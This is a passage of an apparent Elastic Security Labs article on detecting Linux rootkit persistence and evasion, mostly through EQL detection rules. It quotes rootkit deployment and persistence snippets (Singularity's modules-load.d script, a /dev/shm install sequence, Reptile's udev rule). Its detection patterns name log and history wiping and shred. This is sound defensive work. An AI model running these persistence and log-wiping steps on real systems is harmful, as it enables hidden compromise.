  &quot;/root/.bashrc&quot;, &quot;/root/.bash_login&quot;, &quot;/root/.bash_logout&quot;,
  &quot;/root/.bash_profile&quot;, &quot;/root/.bash_aliases&quot;, &quot;/home/*/.bash_aliases&quot;,
  &quot;/home/*/.zprofile&quot;, &quot;/home/*/.zshrc&quot;, &quot;/root/.zprofile&quot;, &quot;/root/.zshrc&quot;,
  &quot;/home/*/.cshrc&quot;, &quot;/home/*/.login&quot;, &quot;/home/*/.logout&quot;, &quot;/root/.cshrc&quot;,
  &quot;/root/.login&quot;, &quot;/root/.logout&quot;, &quot;/home/*/.config/fish/config.fish&quot;,
  &quot;/root/.config/fish/config.fish&quot;, &quot;/home/*/.kshrc&quot;, &quot;/root/.kshrc&quot;
)
</code></pre>
<p>Depending on the environment, several of these shells may not be in use, and a more tailored detection rule may be created, focusing only on <code>bash</code> or <code>zsh</code>, for example. The full detection logic using Elastic Defend and <a href="https://www.elastic.co/kr/docs/reference/integrations/fim">Elastic’s File Integrity Monitoring integration</a> can be found here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_shell_configuration_modification.toml">Shell Configuration Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<p>For more information, a full breakdown of this persistence technique, including several other ways to detect its abuse, is presented in <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms#t1546004---event-triggered-execution-unix-shell-configuration-modification">Linux Detection Engineering - A primer on persistence mechanisms</a>.</p>
<h4>Userland rootkits – configuration-based persistence</h4>
<p>Modifying the <code>/etc/ld.so.preload</code>, <code>/etc/ld.so.conf</code>, or the <code>/etc/ld.so.conf.d/</code> configuration files allow rootkits to persist globally across users and sessions (more information on this persistence vector is available in <a href="https://www.elastic.co/kr/security-labs/continuation-on-persistence-mechanisms#t1574006---hijack-execution-flow-dynamic-linker-hijacking">Linux Detection Engineering - A Continuation on Persistence Mechanisms</a>). Once written, the dynamic linker will continue injecting the malicious shared object unless these configurations are explicitly reverted. These methods are persistent by design. Detection strategies mirror those described in the previous section and rely on monitoring file creation or modification events in these paths.</p>
<h4>Kernel-space rootkits – LKM persistence</h4>
<p>Similar to userland rootkits, LKMs are not persistent by default. An attacker must explicitly configure the system to reload the malicious module on boot. This is typically achieved by leveraging legitimate kernel module loading mechanisms:</p>
<p><strong>Modules file: <code>modules</code></strong></p>
<p>This file lists kernel modules that should be loaded automatically during system startup. Adding a malicious <code>.ko</code> filename here ensures that <code>modprobe</code> will load it upon boot. This file is located at <code>/etc/modules</code>.</p>
<p><strong>Configuration directory for <code>modprobe</code></strong></p>
<p>This directory contains configuration files for the <code>modprobe</code> utility. Attackers may use aliasing to disguise their rootkit or autoload it when a specific kernel event occurs (e.g., when a device is probed). These modprobe configuration files are located at <code>/etc/modprobe.d/</code>, <code>/run/modprobe.d/</code>, <code>/usr/local/lib/modprobe.d/</code>, <code>/usr/lib/modprobe.d/</code>, and <code>/lib/modprobe.d/</code>.</p>
<p><strong>Configure kernel modules to load at boot: <code>modules-load.d</code></strong></p>
<p>These configuration files specify which modules to load early in the boot process and are located at <code>/etc/modules-load.d/</code>, <code>/run/modules-load.d/</code>, <code>/usr/local/lib/modules-load.d/</code>, and <code>/usr/lib/modules-load.d/</code>.</p>
<p>To detect all of the persistence techniques listed above, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/modules&quot;,
  &quot;/etc/modprobe.d/*&quot;,
  &quot;/run/modprobe.d/*&quot;,
  &quot;/usr/local/lib/modprobe.d/*&quot;,
  &quot;/usr/lib/modprobe.d/*&quot;,
  &quot;/lib/modprobe.d/*&quot;,
  &quot;/etc/modules-load.d/*&quot;,
  &quot;/run/modules-load.d/*&quot;,
  &quot;/usr/local/lib/modules-load.d/*&quot;,
  &quot;/usr/lib/modules-load.d/*&quot;
)
</code></pre>
<p>This pre-built rule that combines all of the paths listed above into a single detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_lkm_configuration_file_creation.toml">Loadable Kernel Module Configuration File Creation</a></li>
</ul>
<p>An example of a rootkit that automatically deploys persistence using this method is Singularity. Within its deployment, the following commands are executed:</p>
<pre><code class="language-shell">read -p &quot;Enter the module name (without .ko): &quot; MODULE_NAME
CONF_DIR=&quot;/etc/modules-load.d&quot;
mkdir -p &quot;$CONF_DIR&quot;
echo &quot;[*] Setting up persistence...&quot;
echo &quot;$MODULE_NAME&quot; &gt; &quot;$CONF_DIR/$MODULE_NAME.conf&quot;
</code></pre>
<p>By default, this means that <code>singularity.conf</code> will be created as a new entry under <code>/etc/modules-load.d/</code>. Looking at telemetry, we detect this technique simply by monitoring for new file creations:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image19.png" alt="Figure 11: Telemetry example of Singularity’s LKM persistence technique" title="Figure 11: Telemetry example of Singularity’s LKM persistence technique." /></p>
<p>These directories are also used for benign LKMs and will therefore be prone to false positives. Another persistence method involves using a trigger- or schedule-based technique to load the kernel module by executing the loader.</p>
<h4>Udev-based persistence – Reptile example</h4>
<p>A less common but powerful persistence method involves abusing udev, the Linux device manager that handles dynamic device events. Udev executes rule-based scripts when specific conditions are met. A full breakdown of this technique is presented in <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Linux Detection Engineering - A Sequel on Persistence Mechanisms</a>. The <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/scripts/rule">Reptile rootkit</a> demonstrates this technique by installing a malicious udev rule under <code>/etc/udev/rules.d/</code>:</p>
<pre><code class="language-shell">ACTION==&quot;add&quot;, ENV{MAJOR}==&quot;1&quot;, ENV{MINOR}==&quot;8&quot;, RUN+=&quot;/lib/udev/reptile&quot;
</code></pre>
<p>This rule was likely used as inspiration by the <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware discovered by Levelblue. Here’s how the rule works:</p>
<ul>
<li><code>ACTION==&quot;add&quot;</code>: Triggers when a new device is added to the system.</li>
<li><code>ENV{MAJOR}==&quot;1&quot;</code>: Matches devices with major number “1”, typically memory-related devices such as <code>/dev/mem</code>, <code>/dev/null</code>, <code>/dev/zero</code>, and <code>/dev/random</code>.</li>
<li><code>ENV{MINOR}==&quot;8&quot;</code>: Further narrows the condition to <code>/dev/random</code>.</li>
<li><code>RUN+=&quot;/lib/udev/reptile&quot;</code>: Executes the Reptile loader binary when the above device is detected.</li>
</ul>
<p>This rule establishes persistence by triggering the execution of a loader binary whenever the <code>/dev/random</code> device is loaded. As a widely used random number generator essential for numerous system applications and the boot process, this method is effective. Activation occurs only upon specific device events, and execution happens with root privileges through the <code>udev daemon</code>. To detect this technique, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.extension == &quot;rules&quot; and file.path like (
  &quot;/lib/udev/*&quot;,
  &quot;/etc/udev/rules.d/*&quot;,
  &quot;/usr/lib/udev/rules.d/*&quot;,
  &quot;/run/udev/rules.d/*&quot;,
  &quot;/usr/local/lib/udev/rules.d/*&quot;
)
</code></pre>
<p>We cover the creation and modification of these files via the following pre-built rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_udev_rule_creation.toml">Systemd-udevd Rule File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h4>General persistence mechanisms</h4>
<p>In addition to kernel module loading paths, attackers may rely on more generic Linux persistence methods to reload userland or kernel-space rootkits via the loader:</p>
<p><strong>Systemd</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a service/timer</a> under any (e.g., <code>/etc/systemd/system/</code>) directory that supports the loader at boot.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
  &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;,
  &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
  &quot;/home/*.config/systemd/user/*&quot;, &quot;/home/*.local/share/systemd/user/*&quot;,
  &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
) and file.extension in (&quot;service&quot;, &quot;timer&quot;)
</code></pre>
<p><strong>Initialization scripts</strong>: <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Create or append to a malicious run-control</a> (<code>/etc/rc.local</code>), <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">SysVinit</a> (<code>/etc/init.d/</code>), or <a href="https://www.elastic.co/kr/security-labs/sequel-on-persistence-mechanisms">Upstart</a> (<code>/etc/init/</code>) script.</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (
  &quot;/etc/init.d/*&quot;, &quot;/etc/init/*&quot;, &quot;/etc/rc.local&quot;, &quot;/etc/rc.common&quot;
)
</code></pre>
<p><strong>Cron jobs</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a cron job</a> that allows for repeated execution of a loader.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and
file.path like (
  &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
  &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;,
  &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;,
  &quot;/var/spool/anacron/*&quot;
)
</code></pre>
<p><strong>Sudoers</strong>: <a href="https://www.elastic.co/kr/security-labs/primer-on-persistence-mechanisms">Create or append to a malicious sudoers configuration</a> as a backdoor.</p>
<pre><code class="language-sql">file where event.type in (&quot;creation&quot;, &quot;change&quot;) and
file.path like &quot;/etc/sudoers*&quot;
</code></pre>
<p>These methods are widely used, flexible, and often easier to detect using process lineage or file-modification telemetry.</p>
<p>The list of pre-built detection rules to detect these persistence techniques is listed below:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_service_creation.toml">Systemd Service Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_scheduled_timer_created.toml">Systemd Timer Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_init_d_file_creation.toml">System V Init Script Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_rc_script_creation.toml">rc.local/rc.common File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_cron_job_creation.toml">Cron Job Created or Modified</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml">Sudoers File Activity</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h3>Rootkit defense evasion techniques</h3>
<p>Although rootkits are, by definition, tools for defense evasion, many implement additional techniques to remain undetected during and after deployment. These methods are designed to avoid visibility in logs, evade endpoint detection agents, and interfere with common investigation workflows. The following section outlines key evasion techniques employed by modern Linux rootkits, categorized by their operational targets.</p>
<h4>Attempts to remain stealthy upon deployment</h4>
<p>Threat actors commonly focus on stealthy execution tactics from a forensics perspective. For example, a threat actor may store and execute its payloads from the <code>/dev/shm</code> shared-memory directory, as this is a fully virtual file system, and therefore the payloads will never touch disk. This is great from a forensics perspective, but as behavioral detection engineers, we find this behavior very suspicious and uncommon.</p>
<p>As an example, although not an actual threat actor, Singularity’s author suggests the following deployment method:</p>
<pre><code class="language-shell">cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
sudo bash setup.sh
sudo bash scripts/x.sh
</code></pre>
<p>There are several trip wires to be installed to detect this behavior with a nearly zero false-positive rate, starting with cloning a GitHub repository into the <code>/dev/shm</code> directory.</p>
<pre><code class="language-sql">sequence by process.entity_id, host.id with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
     (process.name == &quot;git&quot; and process.args == &quot;clone&quot;) or
     (
       process.name in (&quot;wget&quot;, &quot;curl&quot;) and
       process.command_line like~ &quot;*github*&quot;
     )
  )]
  [file where event.type == &quot;creation&quot; and
   file.path like (&quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;)]
</code></pre>
<p>Cloning directories in <code>/tmp</code> and <code>/var/tmp</code> is common, so these could be removed from this rule in environments where cloning repositories is common. The same activity in <code>/dev/shm</code>, however, is very uncommon.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image10.png" alt="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm" title="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm." /></p>
<p>The <code>setup.sh</code> script, called by the loader, continues by compiling the LKM in a <code>/dev/shm/</code> subdirectory. Real threat actors generally do not compile on the host itself, however, it is not that uncommon to see this happen either way.</p>
<pre><code class="language-sql">sequence with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
   process.name like (
     &quot;*gcc*&quot;, &quot;*g++*&quot;, &quot;c++&quot;, &quot;cc&quot;, &quot;c99&quot;, &quot;c89&quot;, &quot;cc1*&quot;, &quot;clang*&quot;,
     &quot;musl-clang&quot;, &quot;tcc&quot;, &quot;zig&quot;, &quot;ccache&quot;, &quot;distcc&quot;
   )] as event0
  [file where event.action == &quot;creation&quot; and file.path like &quot;/dev/shm/*&quot; and
   process.name like (
     &quot;ld&quot;, &quot;ld.*&quot;, &quot;lld&quot;, &quot;ld.lld&quot;, &quot;mold&quot;, &quot;collect2&quot;, &quot;*-linux-gnu-ld*&quot;, 
     &quot;*-pc-linux-gnu-ld*&quot;
   ) and
   stringcontains~(event0.process.command_line, file.name)]
</code></pre>
<p>This endpoint logic detects the execution of a compiler, followed by the linker creating a file in <code>/dev/shm</code> (or a subdirectory).</p>
<p>And finally, since it cloned the whole repository in <code>/dev/shm</code>, and executed <code>setup.sh</code> and <code>x.sh</code>, we will observe process execution from the shared memory directory, which is uncommon in most environments:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.executable like (&quot;/dev/shm/*&quot;, &quot;/run/shm/*&quot;)
</code></pre>
<p>These rules are available within the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml">Git Repository or File Download to Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/331b0c762ef5293cea812a9b676e84527fbe5f73/behavior/rules/linux/defense_evasion_linux_compilation_in_suspicious_directory.toml">Linux Compilation in Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_binary_executed_from_shared_memory_directory.toml">Binary Executed from Shared Memory Directory</a></li>
</ul>
<h4>Masquerading as legitimate processes</h4>
<p>To avoid scrutiny during process enumeration or system monitoring, rootkits often rename their processes and threads to match benign system components. Common disguises include:</p>
<ul>
<li><code>kworker</code>, <code>migration</code>, or <code>rcu_sched</code> (kernel threads)</li>
<li><code>sshd</code>, <code>systemd</code>, <code>dbus-daemon</code>, or <code>bash</code> (userland daemons)</li>
</ul>
<p>These names are chosen to blend in with the output of tools like <code>ps</code>, <code>top</code>, or <code>htop</code>, making manual detection more difficult. Examples of rootkits that leverage this technique include Reptile and <a href="https://www.elastic.co/kr/security-labs/declawing-pumakit">PUMAKIT</a>. Reptile generates unusual network events through <code>kworker</code> upon initialization:</p>
<pre><code class="language-sql">network where event.type == &quot;start&quot; and event.action == &quot;connection_attempted&quot; 
and process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and not (
  destination.ip == null or
  destination.ip == &quot;0.0.0.0&quot; or
  cidrmatch(
    destination.ip,
    &quot;10.0.0.0/8&quot;, &quot;127.0.0.0/8&quot;, &quot;169.254.0.0/16&quot;, &quot;172.16.0.0/12&quot;,
    &quot;192.0.0.0/24&quot;, &quot;192.0.0.0/29&quot;, &quot;192.0.0.8/32&quot;, &quot;192.0.0.9/32&quot;,
    &quot;192.0.0.10/32&quot;, &quot;192.0.0.170/32&quot;, &quot;192.0.0.171/32&quot;, &quot;192.0.2.0/24&quot;, 
    &quot;192.31.196.0/24&quot;, &quot;192.52.193.0/24&quot;, &quot;192.168.0.0/16&quot;, &quot;192.88.99.0/24&quot;,
    &quot;224.0.0.0/4&quot;, &quot;100.64.0.0/10&quot;, &quot;192.175.48.0/24&quot;,&quot;198.18.0.0/15&quot;, 
    &quot;198.51.100.0/24&quot;, &quot;203.0.113.0/24&quot;, &quot;240.0.0.0/4&quot;, &quot;::1&quot;,
    &quot;FE80::/10&quot;, &quot;FF00::/8&quot;
  )
)
</code></pre>
<p>The example below shows Reptile’s port knocking functionality, where the kernel thread forks, changes its session ID to 0, and sets up the network connection:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image5.png" alt="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread" title="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread." /></p>
<p>Reptile is also seen to leverage the same <code>kworker</code> process to create files:</p>
<pre><code class="language-sql">file where event.type == &quot;creation&quot; and
process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image4.png" alt="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread" title="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread." /></p>
<p><a href="https://www.elastic.co/kr/security-labs/declawing-pumakit">PUMAKIT</a> spawns kernel threads to execute userland commands through <code>kthreadd</code>, but similar activity has been observed through a <code>kworker</code> process in other rootkits:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.parent.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and
process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and
process.args == &quot;-c&quot;
</code></pre>
<p>These <code>kworker</code> and <code>kthreadd</code> rules may generate false positives due to the Linux kernel's internal operations. These can easily be excluded on a per-environment basis, or additional command-line arguments can be added to the logic.</p>
<p>These rules are available in the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_linux_kworker_netcon.toml">Network Activity Detected via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/persistence_kworker_file_creation.toml">Suspicious File Creation via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/privilege_escalation_kworker_uid_elevation.toml">Suspicious Kworker UID Elevation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_shell_command_execution_via_kworker.toml">Shell Command Execution via Kworker</a></li>
</ul>
<p>Additionally, malicious processes, such as an initial dropper or a persistence mechanism, may masquerade as kernel threads and leverage a built-in shell function to do so. Leveraging the <code>exec -a</code> command, any process can be spawned with a name of the attacker’s choosing. Kernel process masquerading can be detected through the following detection query:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.command_line like &quot;[*]&quot; and process.args_count == 1
</code></pre>
<p>This behavior is shown below, where several pieces of malware tried to masquerade as either a kernel worker or a web service process.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image8.png" alt="Figure 15: Telemetry example of several malwares masquerading as kernel processes" title="Figure 15: Telemetry example of several malwares masquerading as kernel processes." /></p>
<p>This technique is also commonly abused by threat actors leveraging The Hacker’s Choice (THC) toolkit, specifically upon deploying <a href="https://github.com/hackerschoice/gsocket">gsocket</a>.</p>
<p>Rules related to kernel masquerading, and masquerading via <code>exec -a</code> generally, are available in the protections-artifacts repository:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_process_masquerading_as_kernel_process.toml">Process Masquerading as Kernel Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_potential_process_masquerading_via_exec.toml">Potential Process Masquerading via Exec</a></li>
</ul>
<p>Another technique seen in the wild, and also in <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf">Horse Pill</a>, is the use of <code>prctl</code> to stomp its process name. To ensure this telemetry is available, a custom Auditd rule can be created:</p>
<pre><code class="language-sql">-a exit,always -F arch=b64 -S prctl -k prctl_detection
</code></pre>
<p>And accompanied by the following detection logic:</p>
<pre><code class="language-sql">process where host.os.type == &quot;linux&quot; and auditd.data.syscall == &quot;prctl&quot; and
auditd.data.a0 == &quot;f&quot;
</code></pre>
<p>Will allow for the detection of this technique. In the screenshot below, we can see telemetry examples of this technique being used, where the <code>process.executable</code> is gibberish, and <code>prctl</code> will then be used to masquerade on the system as a legitimate process.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image14.png" alt="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names" title="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names." /></p>
<p>This rule, including its setup instructions, is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_prctl_process_name_tampering.toml">Potential Process Name Stomping with Prctl</a></li>
</ul>
<p>Although there are many ways to masquerade, these are the most common ones observed.</p>
<h4>Log and audit cleansing</h4>
<p>Many rootkits include routines that erase traces of their installation or activity from logs. One of these techniques is to clear the victim’s shell history. This can be detected in two ways. One method is to detect the deletion of the shell history file:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.name in (
  &quot;.bash_history&quot;, &quot;.zsh_history&quot;, &quot;.sh_history&quot;, &quot;.ksh_history&quot;,
  &quot;.history&quot;, &quot;.csh_history&quot;, &quot;.tcsh_history&quot;, &quot;fish_history&quot;
)
</code></pre>
<p>The second method is to detect process executions with command line arguments related to clearing the shell history:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.args in (&quot;rm&quot;, &quot;echo&quot;) or
    (
      process.args == &quot;ln&quot; and process.args == &quot;-sf&quot; and
      process.args == &quot;/dev/null&quot;
    ) or
    (process.args == &quot;truncate&quot; and process.args == &quot;-s0&quot;)
  )
  and process.command_line like~ (
    &quot;*.bash_history*&quot;, &quot;*.zsh_history*&quot;, &quot;*.sh_history*&quot;, &quot;*.ksh_history*&quot;,
    &quot;*.history*&quot;, &quot;*.csh_history*&quot;, &quot;*.tcsh_history*&quot;, &quot;*fish_history*&quot;
  )
) or
(process.name == &quot;history&quot; and process.args == &quot;-c&quot;) or
(
  process.args == &quot;export&quot; and
  process.args like~ (&quot;HISTFILE=/dev/null&quot;, &quot;HISTFILESIZE=0&quot;)
) or
(process.args == &quot;unset&quot; and process.args like~ &quot;HISTFILE&quot;) or
(process.args == &quot;set&quot; and process.args == &quot;history&quot; and process.args == &quot;+o&quot;)
</code></pre>
<p>Having both detection rules (process and file) active will enable a more robust defense-in-depth strategy.</p>
<p>Upon loading, rootkits may taint the kernel or generate out-of-tree messages that can be identified when parsing syslog and kernel logs. To erase their tracks, rootkits may delete these log files:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.path in (
  &quot;/var/log/syslog&quot;, &quot;/var/log/messages&quot;, &quot;/var/log/secure&quot;, 
  &quot;/var/log/auth.log&quot;, &quot;/var/log/boot.log&quot;, &quot;/var/log/kern.log&quot;, 
  &quot;/var/log/dmesg&quot;
)
</code></pre>
<p>Or clear the kernel message buffer through <code>dmesg</code>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;dmesg&quot; and process.args in (&quot;-c&quot;, &quot;--clear&quot;)
</code></pre>
<p>An example of a rootkit that automatically cleans the <a href="https://man7.org/linux/man-pages/man1/dmesg.1.html">dmesg</a> is the <a href="https://github.com/bluedragonsecurity/bds_lkm">bds rootkit</a>, which loads by executing <code>/opt/bds_elf/bds_start.sh</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image12.png" alt="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg" title="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg." /></p>
<p>Another means of clearing these logs is by using <a href="https://man7.org/linux/man-pages/man1/journalctl.1.html">journalctl</a>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;journalctl&quot; and
process.args like (&quot;--vacuum-time=*&quot;, &quot;--vacuum-size=*&quot;, &quot;--vacuum-files=*&quot;)
</code></pre>
<p>This is a technique that was used by Singularity:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image11.png" alt="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl" title="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl." /></p>
<p>Another technique employed by Singularity’s loader script is the deletion of all files associated to the rootkit in case it cannot load, or once it completes its loading process. For more thorough deletion, the author chose the use of <code>shred</code> over <code>rm</code>. <code>rm</code> (remove) simply deletes the file's pointer, making it fast but allowing for data recovery. <code>shred</code> overwrites the file data multiple times with random data, ensuring it cannot be recovered. This makes the deletion more permanent but, at the same time, noisier from a behavior-detection point of view, since <code>shred</code> is not commonly used on most Linux systems.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;shred&quot; and (
// Any short-flag cluster containing at least one of u/z, 
// and containing no extra &quot;-&quot; after the first one
process.args regex~ &quot;-[^-]*[uz][^-]*&quot; or
process.args in (&quot;--remove&quot;, &quot;--zero&quot;)
) and
not process.parent.name == &quot;logrotate&quot;
</code></pre>
<p>The regex above ensures that attempts to evade detection by combining or modifying flags become more difficult. Below is an example of Singularity looking for any files related to its deployment, and shredding them:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image13.png" alt="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence" title="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence." /></p>
<p>These file and log removal techniques can be detected via several out-of-the-box detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_log_files_deleted.toml">System Log File Deletion</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml">Attempt to Clear Kernel Ring Buffer</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_journalctl_clear_logs.toml">Attempt to Clear Logs via Journalctl</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_file_deletion_via_shred.toml">File Deletion via Shred</a></li>
</ul>
<p>Once a rootkit is finished clearing its traces, it may timestomp the files it altered to ensure no file modification trace is left behind:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;touch&quot; and
process.args like (
  &quot;-t*&quot;, &quot;-d*&quot;, &quot;-a*&quot;, &quot;-m*&quot;, &quot;-r*&quot;, &quot;--date=*&quot;, &quot;--reference=*&quot;, &quot;--time=*&quot;
)
</code></pre>
<p>An example of this is shown here, where a threat actor uses the <code>/etc/ld.so.conf</code> file’s timestamp as a reference time to the files on the <code>/dev/shm</code> drive in an attempt to blend in:</p>
